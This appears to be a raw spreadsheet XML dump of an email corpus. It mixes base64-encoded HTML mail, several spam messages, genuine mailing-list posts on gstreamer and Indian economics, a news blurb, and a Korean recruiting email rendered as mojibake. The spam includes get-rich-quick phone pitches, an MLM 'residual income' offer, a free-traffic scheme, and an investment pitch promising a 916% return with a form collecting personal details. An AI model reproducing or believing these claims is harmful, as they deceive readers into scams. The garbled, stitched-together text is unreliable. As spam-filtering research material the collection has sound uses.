 QWRqdXN0TGluZUhlaWdodEluVGFibGUvPg0KICAgPHc6VXNlRkVMYXlvdXQvPg0KICA8L3c6Q29t
 cGF0aWJpbGl0eT4NCiA8L3c6V29yZERvY3VtZW50Pg0KPC94bWw+PCFbZW5kaWZdLS0+DQo8c3R5
 bGU+DQo8IS0tDQogLyogRm9udCBEZWZpbml0aW9ucyAqLw0KQGZvbnQtZmFjZQ0KCXtmb250LWZh
 bWlseTq3c7LTqfrF6TsNCglwYW5vc2UtMToyIDIgMyAwIDAgMCAwIDAgMCAwOw0KCW1zby1mb250
 LWFsdDpQTWluZ0xpVTsNCgltc28tZm9udC1jaGFyc2V0OjEzNjsNCgltc28tZ2VuZXJpYy1mb250
 LWZhbWlseTpyb21hbjsNCgltc28tZm9udC1waXRjaDp2YXJpYWJsZTsNCgltc28tZm9udC1zaWdu
 YXR1cmU6MSAxMzQ3NDIwMTYgMTYgMCAxMDQ4NTc2IDA7fQ0KQGZvbnQtZmFjZQ0KCXtmb250LWZh
 bWlseToiXEC3c7LTqfrF6SI7DQoJcGFub3NlLTE6MiAyIDMgMCAwIDAgMCAwIDAgMDsNCgltc28t
 Zm9udC1jaGFyc2V0OjEzNjsNCgltc28tZ2VuZXJpYy1mb250LWZhbWlseTpyb21hbjsNCgltc28t
 Zm9udC1waXRjaDp2YXJpYWJsZTsNCgltc28tZm9udC1zaWduYXR1cmU6MSAxMzQ3NDIwMTYgMTYg
 MCAxMDQ4NTc2IDA7fQ0KIC8qIFN0eWxlIERlZmluaXRpb25zICovDQpwLk1zb05vcm1hbCwgbGku
 TXNvTm9ybWFsLCBkaXYuTXNvTm9ybWFsDQoJe21zby1zdHlsZS1wYXJlbnQ6IiI7DQoJbWFyZ2lu
 OjBjbTsNCgltYXJnaW4tYm90dG9tOi4wMDAxcHQ7DQoJbXNvLXBhZ2luYXRpb246bm9uZTsNCglm
 b250LXNpemU6MTIuMHB0Ow0KCWZvbnQtZmFtaWx5OiJUaW1lcyBOZXcgUm9tYW4iOw0KCW1zby1m
 YXJlYXN0LWZvbnQtZmFtaWx5OrdzstOp+sXpOw0KCW1zby1mb250LWtlcm5pbmc6MS4wcHQ7fQ0K
 YTpsaW5rLCBzcGFuLk1zb0h5cGVybGluaw0KCXtjb2xvcjpibHVlOw0KCXRleHQtZGVjb3JhdGlv
 bjp1bmRlcmxpbmU7DQoJdGV4dC11bmRlcmxpbmU6c2luZ2xlO30NCmE6dmlzaXRlZCwgc3Bhbi5N
 c29IeXBlcmxpbmtGb2xsb3dlZA0KCXtjb2xvcjpwdXJwbGU7DQoJdGV4dC1kZWNvcmF0aW9uOnVu
 ZGVybGluZTsNCgl0ZXh0LXVuZGVybGluZTpzaW5nbGU7fQ0KIC8qIFBhZ2UgRGVmaW5pdGlvbnMg
 Ki8NCkBwYWdlDQoJe21zby1wYWdlLWJvcmRlci1zdXJyb3VuZC1oZWFkZXI6bm87DQoJbXNvLXBh
 Z2UtYm9yZGVyLXN1cnJvdW5kLWZvb3Rlcjpubzt9DQpAcGFnZSBTZWN0aW9uMQ0KCXtzaXplOjEw
 LjBjbSAxMC4wY207DQoJbWFyZ2luOjcyLjBwdCA4OS44NXB0IDcyLjBwdCA4OS44NXB0Ow0KCW1z
 by1oZWFkZXItbWFyZ2luOjQyLjU1cHQ7DQoJbXNvLWZvb3Rlci1tYXJnaW46NDkuNnB0Ow0KCW1z
 by1wYXBlci1zb3VyY2U6MDsNCglsYXlvdXQtZ3JpZDoxOC4wcHQ7fQ0KZGl2LlNlY3Rpb24xDQoJ
 e3BhZ2U6U2VjdGlvbjE7fQ0KLS0+DQo8L3N0eWxlPg0KPC9oZWFkPg0KDQo8Ym9keSBsYW5nPVpI
 LVRXIGxpbms9Ymx1ZSB2bGluaz1wdXJwbGUgc3R5bGU9J3RhYi1pbnRlcnZhbDoyNC4wcHQ7dGV4
 dC1qdXN0aWZ5LXRyaW06DQpwdW5jdHVhdGlvbic+DQoNCjxkaXYgY2xhc3M9U2VjdGlvbjEgc3R5
 bGU9J2xheW91dC1ncmlkOjE4LjBwdCc+DQoNCjxwIGNsYXNzPU1zb05vcm1hbCBzdHlsZT0ndGV4
 dC1hbGlnbjpqdXN0aWZ5O3RleHQtanVzdGlmeTppbnRlci1pZGVvZ3JhcGgnPjxzcGFuDQpzdHls
 ZT0nZm9udC1mYW1pbHk6t3Oy06n6xek7bXNvLWFzY2lpLWZvbnQtZmFtaWx5OiJUaW1lcyBOZXcg
 Um9tYW4iJz6mcKazpbTCWqZiprmtUKRXuFWkwLpwt048L3NwYW4+PHNwYW4NCmxhbmc9RU4tVVMg
 c3R5bGU9J2ZvbnQtZmFtaWx5OrdzstOp+sXpO2NvbG9yOndoaXRlJz48bzpwPjwvbzpwPjwvc3Bh
 bj48L3A+DQoNCjxwIGNsYXNzPU1zb05vcm1hbCBzdHlsZT0nbXNvLXBhZ2luYXRpb246d2lkb3ct
 b3JwaGFuO2xheW91dC1ncmlkLW1vZGU6Y2hhcic+PHNwYW4NCnN0eWxlPSdmb250LWZhbWlseTq3
 c7LTqfrF6Ttjb2xvcjpibGFjayc+pnCko8RApqyo7Ka5IDwvc3Bhbj48c3BhbiBzdHlsZT0nZm9u
 dC1zaXplOjE2LjBwdDsNCm1zby1iaWRpLWZvbnQtc2l6ZToxMi4wcHQ7Zm9udC1mYW1pbHk6t3Oy
 06n6xek7Y29sb3I6cmVkJz61b7Bdq0g8L3NwYW4+PHNwYW4NCnN0eWxlPSdmb250LWZhbWlseTq3
 c7LTqfrF6Ttjb2xvcjpibGFjayc+oUG90KdSsKOhQyA8c3BhbiBsYW5nPUVOLVVTPjxvOnA+PC9v
 OnA+PC9zcGFuPjwvc3Bhbj48L3A+DQoNCjxwIGNsYXNzPU1zb05vcm1hbCBzdHlsZT0nbXNvLXBh
 Z2luYXRpb246d2lkb3ctb3JwaGFuO2xheW91dC1ncmlkLW1vZGU6Y2hhcic+PHNwYW4NCnN0eWxl
 PSdmb250LWZhbWlseTq3c7LTqfrF6Ttjb2xvcjpibGFjayc+pl2n2q91qrqr3MP4p+So7KdBo3g8
 c3BhbiBsYW5nPUVOLVVTPkVtYWlsLqdSsKOhQzxvOnA+PC9vOnA+PC9zcGFuPjwvc3Bhbj48L3A+
 DQoNCjxwIGNsYXNzPU1zb05vcm1hbCBzdHlsZT0nbXNvLXBhZ2luYXRpb246d2lkb3ctb3JwaGFu
 O2xheW91dC1ncmlkLW1vZGU6Y2hhcic+PHNwYW4NCnN0eWxlPSdmb250LWZhbWlseTq3c7LTqfrF
 6Ttjb2xvcjpibGFjayc+vdCnT6ZBvXyn2qN7oUHBwsHCp0GhQzwvc3Bhbj48c3BhbiBsYW5nPUVO
 LVVTDQpzdHlsZT0nZm9udC1mYW1pbHk6t3Oy06n6xek7Y29sb3I6YmxhY2s7bXNvLWZvbnQta2Vy
 bmluZzowcHQnPjxvOnA+PC9vOnA+PC9zcGFuPjwvcD4NCg0KPHAgY2xhc3M9TXNvTm9ybWFsIHN0
 eWxlPSdsYXlvdXQtZ3JpZC1tb2RlOmNoYXInPjxzcGFuIGxhbmc9RU4tVVMNCnN0eWxlPSdmb250
 LXNpemU6MTYuMHB0O21zby1iaWRpLWZvbnQtc2l6ZToxMi4wcHQ7Zm9udC1mYW1pbHk6t3Oy06n6
 xek7Y29sb3I6cmVkJz48YQ0KaHJlZj0iaHR0cDovL2Nvb2xzaXRlLnRvL2RhbmV0dSI+PHNwYW4g
 c3R5bGU9J2NvbG9yOnJlZCc+q/an2jwvc3Bhbj48L2E+PC9zcGFuPjxzcGFuDQpzdHlsZT0nZm9u
 dC1mYW1pbHk6t3Oy06n6xek7Y29sb3I6cmVkJz6hXaRGuNGn86ZooV48c3BhbiBsYW5nPUVOLVVT
 PjxvOnA+PC9vOnA+PC9zcGFuPjwvc3Bhbj48L3A+DQoNCjwvZGl2Pg0KDQo8L2JvZHk+DQoNCjwv
 aHRtbD4=
 ------=_NextPart_GimEwuvgROJ8eFyeYA6Wmjd9wbYV6AA--
 ------=_NextPart_GimEwuvgROJ8eFyeYA6Wmjd9wbYV6--
</t>
  </si>
  <si>
    <t xml:space="preserve">Do You Want To Make $1000 Or More Per Week?
 If you are a motivated and qualified individual - I 
 will personally demonstrate to you a system that will 
 make you $1,000 per week or more! This is NOT mlm.
 Call our 24 hour pre-recorded number to get the 
 details.  
 801-296-4210
 I need people who want to make serious money.  Make 
 the call and get the facts. 
 Invest 2 minutes in yourself now!
 801-296-4210
 Looking forward to your call and I will introduce you 
 to people like yourself who
 are currently making $10,000 plus per week!
 801-296-4210
 3484lJGv6-241lEaN9080lRmS6-271WxHo7524qiyT5-438rjUv5615hQcf0-662eiDB9057dMtVl72
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: How to get 10,000 FREE hits per day to any website
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Subscriber,
 If I could show you a way to get up to 10,000 visitors a day to your web site, noting that it will cost you no money, and only 30 minutes a day of your time would you be interested?
 Click on the link (or copy and paste to your browser) for more information:
 http://www.worldbizservices.net/your/mpam/moreinfo.asp
 And I promise you this is not some disguised solicitation for money. You do not need to outlay a single, solitary dollar, pound, punt, rand, mark or euro for this 12 step lesson plan to work for you.
 This is a marketing strategy that out-performs anything you have seen before. Register for free and you will learn how to combine the synergistic potential of over 50 free programs.
 Click on the link (or copy and paste to your browser) to see the proof:
 http://www.worldbizservices.net/your/mpam/moreinfo.asp
 Our main site receives over 28,000 visitors a day, with each visitor averaging 2.8 page views. We have received over 11 million visitors since we began!
 Over 117,000 people worldwide have joined this program during the 10 months it has been operating.
 Act today - click on the link (or copy and paste to your browser) to join them in their success:
 http://www.worldbizservices.net/your/mpam/moreinfo.asp
 My very best wishes
 Mike
 p.s. This 12 step instruction course is absolutely free, and once you have completed it only an hour or less a day is needed to get thousands of visitors to any website you choose!
 http://www.worldbizservices.net/your/mpam/moreinfo.asp
 ********************************************
 You are receiving this email either as agreed to when you posted to one of our many ffa pages, classified ad sites or search engines (either manually or through an automatic submission service), or you are on a list of people who are interested in increasing their web site traffic and income.
 If this is not the case PLEASE accept our sincerest apologies and follow the link below to unsubscribe from our mailing list.
 http://www.worldbizservices.net/your/unsubscribe.asp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</si>
  <si>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On 14 Aug 2002 10:59:22 -0400, "Thomas J. Baker" &lt;tjb@unh.edu&gt; wrote:
 &gt; Has anyone had any luck with the gstreamer repository? I'm using RH 7.3
 &gt; and Ximian Gnome 2 snaps and the gstreamer stuff just doesn't work at
 &gt; all. Rhythmbox crashes on startup, gst-player can't play a simple mpg
 &gt; file, etc.
     I'm in your same shoes- I can get it upgraded and all, but I can never seem to work out where to start out with the thing; it strikes me as confusing!  But to be fair, I appreciate the pipline idea; just as it's useful on the commandline, it'll be emensely powerful for manipulating multimedia, too.    It's just not EASY yet.  I'm sure all kindsa glade-produced front-ends will come up for it soon, though.  And the docs are complete, too...
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 "Waddling" into the mainstream?  I suppose...
 http://www.usatoday.com/usatonline/20020805/4333165s.htm
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Be First...It"s Your Turn...Don't Miss Out! nox
</t>
  </si>
  <si>
    <t xml:space="preserve">Finally: After 15 Years of Research and Development..A True WEIGHT LOSS Breakthrough Years Ahead of it's Time! 
 SERIOUSLY: DEEP DOWN YOU KNOW THAT MILLIONAIRES ARE MADE BY GETTING INVOLVED IN OPPORTUNITIES BEFORE THE GENERAL PUBLIC FINDS OUT...HERE IS YOUR CHANCE TO GET INVOLVED WITH A PRODUCT THAT CAN LEAD TO SERIOUS, MONTHLY RESIDUAL INCOME (Do the work once and keep getting paid!)...FIND OUT WHY...FIND OUT HOW...NOW!
 Send a blank email with the words "SUBSCRIBE to T.E.D" in the subject area to:
 jmpro@hotpop.com
 This is your first step towards working with a team of 7 figure income earners that can teach you how to do the same because of a proven system that will be customized for you!
 mmuocfvfbxotxknbnbdytkwdbonvovyv
</t>
  </si>
  <si>
    <t xml:space="preserve">All good arguments, except till you realize that
 majority of indians were poor even before
 independence. 
 Sateesh
 --- "R. A. Hettinga" &lt;rah@shipwright.com&gt; wrote:
 &gt;
 http://online.wsj.com/article_print/0,,SB1029790639190441115,00.html
 &gt; 
 &gt; 
 &gt; The Wall Street Journal
 &gt; 
 &gt; August 20, 2002
 &gt; COMMENTARY
 &gt; 
 &gt; The Curse of India's Socialism
 &gt; 
 &gt; By CHRISTOPHER LINGLE
 &gt; 
 &gt; In a classic case of deflecting blame for their own
 &gt; shortcomings,
 &gt; politicians in India have identified the size of the
 &gt; population as the
 &gt; country's biggest problem. This position was stated
 &gt; in a unanimous
 &gt; parliamentary resolution passed on the 50th
 &gt; anniversary of independence.
 &gt; Half a decade later, it is a belief that still
 &gt; resonates with many. Yet it
 &gt; is hard to imagine a more cynical view. If left free
 &gt; from the extensive
 &gt; interference of various levels of government, the
 &gt; energy and creativity of
 &gt; the Indian people could soon allow them to be among
 &gt; the richest on earth.
 &gt; 
 &gt; Indians are not poor because there are too many of
 &gt; them; they are poor
 &gt; because there are too many regulations and too much
 &gt; government intervention
 &gt; -- even today, a decade after reforms were begun.
 &gt; India's greatest problems
 &gt; arise from a political culture guided by socialist
 &gt; instincts on the one
 &gt; hand and an imbedded legal obligation on the other
 &gt; hand.
 &gt; 
 &gt; While India's political culture reflects the beliefs
 &gt; of its founding
 &gt; fathers, there is the additional matter of the
 &gt; modified preamble to its
 &gt; constitution that specifies: "India is a sovereign,
 &gt; secular, socialist
 &gt; republic." It was Indira Gandhi who had the words
 &gt; "socialist" and "secular"
 &gt; added in the late 1970s. At the same time, she also
 &gt; amended the relevant
 &gt; section in the Representation of Peoples Act to
 &gt; require that all recognized
 &gt; and registered parties swear by this preamble. Since
 &gt; all parties must stand
 &gt; for socialism, no party espouses classical
 &gt; liberalism (yet there are
 &gt; numerous communist parties).
 &gt; 
 &gt; While one can appreciate the difficulty of
 &gt; abandoning ideas with such
 &gt; honored lineage, the fact that socialism has been
 &gt; widely discredited and
 &gt; abandoned in most places should prompt Indians to
 &gt; reconsider this
 &gt; commitment. Despite evidence of its failure as an
 &gt; economic system, many of
 &gt; the socialists who carry on do so by trying to
 &gt; proclaim that their dogma
 &gt; reinforces certain civic virtues. A presumed merit
 &gt; of socialism is that it
 &gt; aims to nurture a greater sense of collective
 &gt; identity by suppressing the
 &gt; narrow self-interest of individuals. However, this
 &gt; aspect of socialism lies
 &gt; at the heart of its failure both as a political tool
 &gt; as well as the basis
 &gt; for economic policy.
 &gt; 
 &gt; Let's start with the economic failures of socialism.
 &gt; Most of the grand
 &gt; experiments have been ignominiously abandoned or
 &gt; recast in tortured terms
 &gt; such as the "Third Way" that defer to the importance
 &gt; of markets and
 &gt; individual incentives. Unfortunately, it took a
 &gt; great deal of human
 &gt; suffering before socialists abandoned their goal of
 &gt; trying to create an
 &gt; economic system on the basis of collective goals.
 &gt; 
 &gt; Socialist ideologues are impervious to evidence that
 &gt; their system inspires
 &gt; even more human misery in the civic realm. This is
 &gt; because socialism
 &gt; provides the political mechanism for and legitimacy
 &gt; by which people
 &gt; identify as members of groups. While it may suit the
 &gt; socialist agenda to
 &gt; create them-and-us scenarios relating to workers and
 &gt; capitalists or
 &gt; peasants and urban dwellers, this logic is readily
 &gt; converted to other types
 &gt; of divisions.
 &gt; 
 &gt; In the case of India, competition for power has
 &gt; increasingly become
 &gt; identified with religiosity or ethnicity, as is
 &gt; evident by the rise of the
 &gt; Bharatiya Janata Party, supported by radical
 &gt; Hindutva supporters. As
 &gt; elsewhere, political parties based on religion are
 &gt; by their very nature
 &gt; exclusionary. These narrow concepts of identity work
 &gt; against nation
 &gt; building since such a politics forces arrangements
 &gt; that cannot accommodate
 &gt; notions of universal values.
 &gt; 
 &gt; Socialism also sets the stage for populist promises
 &gt; of taking from one
 &gt; group to support another. This variety of political
 &gt; posturing by the
 &gt; Congress Party was used to build a coalition of
 &gt; disaffected minorities. In
 &gt; turn, the BJP built its power base on a promise to
 &gt; restore power to Hindus.
 &gt; And so it is that India's heritage of socialist
 &gt; ideology provided the
 &gt; beginnings of a political culture that evolved into
 &gt; sectarian populism that
 &gt; has wrought cycles of communal violence. Populism
 &gt; with its solicitations of
 &gt; political patronage, whether based upon nationalism
 &gt; or some other ploy, is
 &gt; also open to the sort of rampant corruption so
 &gt; evident in India.
 &gt; 
 &gt; At issue in India is nothing less than the role of
 &gt; the state. Should it be
 &gt; used as a mechanism to protect the freedom and
 &gt; rights of individuals? Or
 &gt; should the state be a vehicle for groups to gain
 &gt; power? It should be clear
 &gt; the latter approach would lead to the destruction of
 &gt; India's democracy
 &gt; while the former will allow it to survive.
 &gt; 
 &gt; It is undeniable that India's public policy guided
 &gt; by socialism has
 &gt; promoted divisions that contributed to social
 &gt; instability and economic
 &gt; destruction. This dangerous game has only served the
 &gt; narrow interests of
 &gt; those who seek to capture or preserve power. That
 &gt; India is a "socialist"
 &gt; state, specified in a preamble to the constitution,
 &gt; makes this binding
 &gt; commitment evident in the nature of interventionist
 &gt; policies that have
 &gt; wrought slower economic growth causing great harm to
 &gt; the poor and unskilled
 &gt; who have lost access to economic opportunities.
 &gt; Socialism also introduced
 &gt; forces that are destroying India's hard-earned
 &gt; democracy. A paradigm shift
 &gt; in the nature of Indian politics is needed so the
 &gt; state ceases serving as a
 &gt; mechanism for groups to gain power and instead
 &gt; becomes an instrument to
 &gt; secure rights and freedoms for individuals.
 &gt; 
 &gt; Mr. Lingle is professor of economics at Universidad
 &gt; Francisco Marroquin in
 &gt; Guatemala, and global strategist for
 &gt; eConoLytics.com.
 &gt; 
 &gt; 
 &gt; 
 &gt; -- 
 &gt; -----------------
 &gt; R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 &gt; The Internet Bearer Underwriting Corporation
 &gt; &lt;http://www.ibuc.com/&gt;
 &gt; 44 Farquhar Street, Boston, MA 02131 USA
 &gt; "... however it may deserve respect for its
 &gt; usefulness and antiquity,
 &gt; [predicting the end of the world] has not been found
 &gt; agreeable to
 &gt; experience." -- Edward Gibbon, 'Decline and Fall of
 &gt; the Roman Empire'
 &gt; http://xent.com/mailman/listinfo/fork
 __________________________________________________
 Do You Yahoo!?
 HotJobs - Search Thousands of New Jobs
 http://www.hotjobs.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Major Medical Breakthrough Huge Profit Potential
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META content="text/html; charset=iso-8859-1" http-equiv=Content-Type&gt;
 &lt;META content="MSHTML 5.00.3315.2870" name=GENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff&gt;
 &lt;DIV&gt;&lt;FONT face=Arial size=2&gt;
 &lt;TABLE align=center width="80%"&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;
       &lt;TABLE width="85%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
             &lt;TD&gt;&amp;nbsp;&lt;/TD&gt;
           &lt;TD align=middle&gt;&lt;FONT face=arial size=+1&gt;&lt;B&gt;Major Medical 
             Breakthrough&lt;BR&gt;Huge Profit Potential&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P align=justify&gt;&lt;FONT face=arial&gt;Imagine yourself as part owner of the 
       most interesting, full service state-of-the-art medical facility, equipped 
       with the most sophisticated and effective scanning diagnostic tools 
       available today.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=justify&gt;&lt;FONT face=arial&gt;Electron Beam Tomography is a 
       cutting-edge diagnostic technology capable of providing a 
       crystal-ball-like look into your medical future. This technology has been 
       featured on Oprah, Larry King, Good Morning America, and USA 
       Today.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=justify&gt;&lt;FONT face=arial&gt;EBT Scans are now covered by most health 
       insurance companies and HMOs, causing an explosion in usership and 
       exceptionally high demand for this procedure.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=justify&gt;&lt;FONT face=arial&gt;EBT can identify heart disease years 
       before a treadmill test would show an abnormality and many years before a 
       heart attack might occur.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=justify&gt;&lt;FONT face=arial&gt;A tremendous improvement upon standard 
       computerized tomography, also known as CT or CAT Scan, Electron Beam 
       Tomography provides images of a beating heart up to 10 times faster and 
       clearer than other conventional scanners.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=justify&gt;&lt;FONT face=arial&gt;The dramatic capabilities of this 
       spectacular technology should provide an extraordinary investment 
       opportunity for those establishing state-of-the-art outpatient clinics, in 
       order to provide the EBT body scan procedures to health conscious 
       Americans. Projected 10-year return of 916%.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=justify&gt;&lt;FONT face=arial&gt;A full-body scan using this technology 
       can also be used to detect osteoporosis, aneurisms, emphysema, gallstones, 
       hiatal hernia, degenerative spine conditions, as well as cancer of the 
       lungs, liver, kidneys, and colon.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=justify&gt;&lt;FONT face=arial&gt;Imagine being instrumental in bringing 
       the most revolutionary diagnostic and preventative medical device to the 
       marketplace.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=justify&gt;&lt;FONT face=arial&gt;$15K minimum investment required. 
       Serious inquiries only.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT face=arial&gt;To recieve your free video. Fill out this form.
       &lt;CENTER&gt;&lt;form method="POST" action="mailto:pedrospanks@phantasmo.com"&gt;
               &lt;center&gt;
                 &lt;table&gt;
                   &lt;tr&gt; 
                     &lt;td&gt; 
                       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;Name:&lt;/font&gt;&lt;/p&gt;
                     &lt;/td&gt;
                     &lt;td&gt; 
                       &lt;input type="TEXT" name="Name" size="30"&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td&gt; 
                       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;Phone Number&lt;br&gt;
                         (including area code):&lt;/font&gt;&lt;/p&gt;
                     &lt;/td&gt;
                     &lt;td valign="middle"&gt; 
                       &lt;input type="TEXT" name="Phone" size="30"&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td&gt; 
                       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;Mailing Address:&lt;/font&gt;&lt;/p&gt;
                     &lt;/td&gt;
                     &lt;td&gt; 
                       &lt;input type="TEXT" name="mailingaddress" size="50"&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td&gt; 
                       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;Province / 
                         State:&lt;/font&gt;&lt;/p&gt;
                     &lt;/td&gt;
                     &lt;td&gt; 
                       &lt;input type="TEXT" name="province" size="30"&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td height="29"&gt; 
                       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;Postal Code&lt;/font&gt;&lt;/p&gt;
                     &lt;/td&gt;
                     &lt;td height="29"&gt; 
                       &lt;input type="TEXT" name="postalcode" size="30"&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td&gt; 
                       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/p&gt;
                     &lt;/td&gt;
                     &lt;td&gt;&amp;nbsp;&lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td&gt; 
                       &lt;p&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;E-mail Address:&lt;/font&gt;&lt;/p&gt;
                     &lt;/td&gt;
                     &lt;td&gt; 
                       &lt;input type="TEXT" name="Email" size="30"&gt;
                     &lt;/td&gt;
                   &lt;/tr&gt;
                   &lt;tr&gt; 
                     &lt;td&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;/font&gt;&lt;/td&gt;
                     &lt;td&gt;&amp;nbsp;&lt;/td&gt;
                   &lt;/tr&gt;
                 &lt;/table&gt;
                 &lt;br&gt;
                 &lt;input type="SUBMIT" value="      OK      " name="SUBMIT"&gt;
               &lt;/center&gt;
             &lt;/form&gt;
         &lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;font size="1"&gt;To be removed from this list please reply with UNSUBSCRIBE.  Thank you.&lt;/font&gt;&lt;/CENTER&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Freedom deal for Real IRA man
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8597650,215/
 Date: 2002-10-06T02:28:05+01:00
 Michael McKevitt, the founder of the Real IRA, is likely to serve less than two 
 more years in jail in a deal to cover up MI5's role in Ireland.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: []  ߴ  Best 5 &amp; ڰ  ǳ
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="content-type" content="text/html; charset=euc-kr"&gt;
 &lt;title&gt; ߴ  Best 5 :  / IT /  / Ƽ / ׸&lt;/title&gt;
 &lt;meta name="generator" content="Namo WebEditor v5.0"&gt;
 &lt;/head&gt;
 &lt;BODY text=black vLink=purple aLink=red link=blue bgColor=white&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width=672 border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD width=7 bgColor=#ffffff&gt;&lt;IMG height=1
 src="http://image.hanmail.net/hanmail/general/trans.gif" width=7&gt;&lt;BR&gt;&lt;/TD&gt;
 &lt;TD vAlign=top width="99%" bgColor=#ffffff&gt;&lt;IMG height=105
 src="http://image.hanmail.net/hanmail/s_img/recruit/sp_top01.gif"
 width=221&gt;&lt;IMG height=105
 src="http://image.hanmail.net/hanmail/s_img/recruit/sp_top02.gif"
 width=442&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD width=5&gt;&lt;IMG height=8
 src="http://image.hanmail.net/hanmail/s_img/recruit/g_raound01.gif"
 width=5&gt;&lt;BR&gt;&lt;/TD&gt;
 &lt;TD width="97%" bgColor=#cbd940&gt;&lt;/TD&gt;
 &lt;TD width=13&gt;&lt;IMG height=8
 src="http://image.hanmail.net/hanmail/s_img/recruit/g_raound02.gif"
 width=5&gt;&lt;BR&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD
 style="BORDER-RIGHT: #abc25c 1px solid; BORDER-TOP: #abc25c 1px solid; BORDER-LEFT: #abc25c 1px solid; BORDER-BOTTOM: #abc25c 1px solid"
 width=681 colSpan=3&gt;
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD
 style="PADDING-RIGHT: 8px; PADDING-LEFT: 8px; PADDING-BOTTOM: 8px; PADDING-TOP: 8px"&gt;&lt;IMG
 height=6
 src="http://image.hanmail.net/hanmail/s_img/recruit/g_arrow01.gif"
 width=4 align=absMiddle&gt; &lt;B&gt;&lt;FONT color=#518900&gt; ߴ  Best
 5 :  / IT /  / Ƽ / ׸&lt;/FONT&gt;&lt;/B&gt; &lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD
 background=http://image.hanmail.net/hanmail/s_img/recruit/g_jeum.gif&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD
 style="PADDING-RIGHT: 8px; PADDING-LEFT: 8px; PADDING-BOTTOM: 8px; LINE-HEIGHT: 135%; PADDING-TOP: 8px"&gt;&lt;FONT
 face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;20 ̵  'ϰ 
 о' , IT, , Ƽ/м, ׸/о߰ Ǿ.&lt;/SPAN&gt;&lt;/FONT&gt;
 &lt;P&gt;&lt;FONT face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;̵ ߿ оߴ
 ޿   5 ٹ ռִ 'ܱ ', ITоߴ ''о߰, ۺоߴ 
 ż л  ȣϴ  Ȩ 'ȣƮ' ̺ 'VJ', Ƽ/мǺоߴ ڸ
  ɰ  'Ǻΰ' Ǵ 'ŸϸƮ', ׸/о߿ 𵨸 տ Ծ
 '׸'   .&lt;/SPAN&gt;&lt;/FONT&gt;
 &lt;P&gt;&lt;B&gt;&lt;FONT face=&gt;&lt;SPAN style="FONT-SIZE: 10pt"&gt;׷, ó 
 ְ ϰ ִ  ٹϱ ؼ  ڰݿҸ ߴ  ?&lt;BR&gt; 
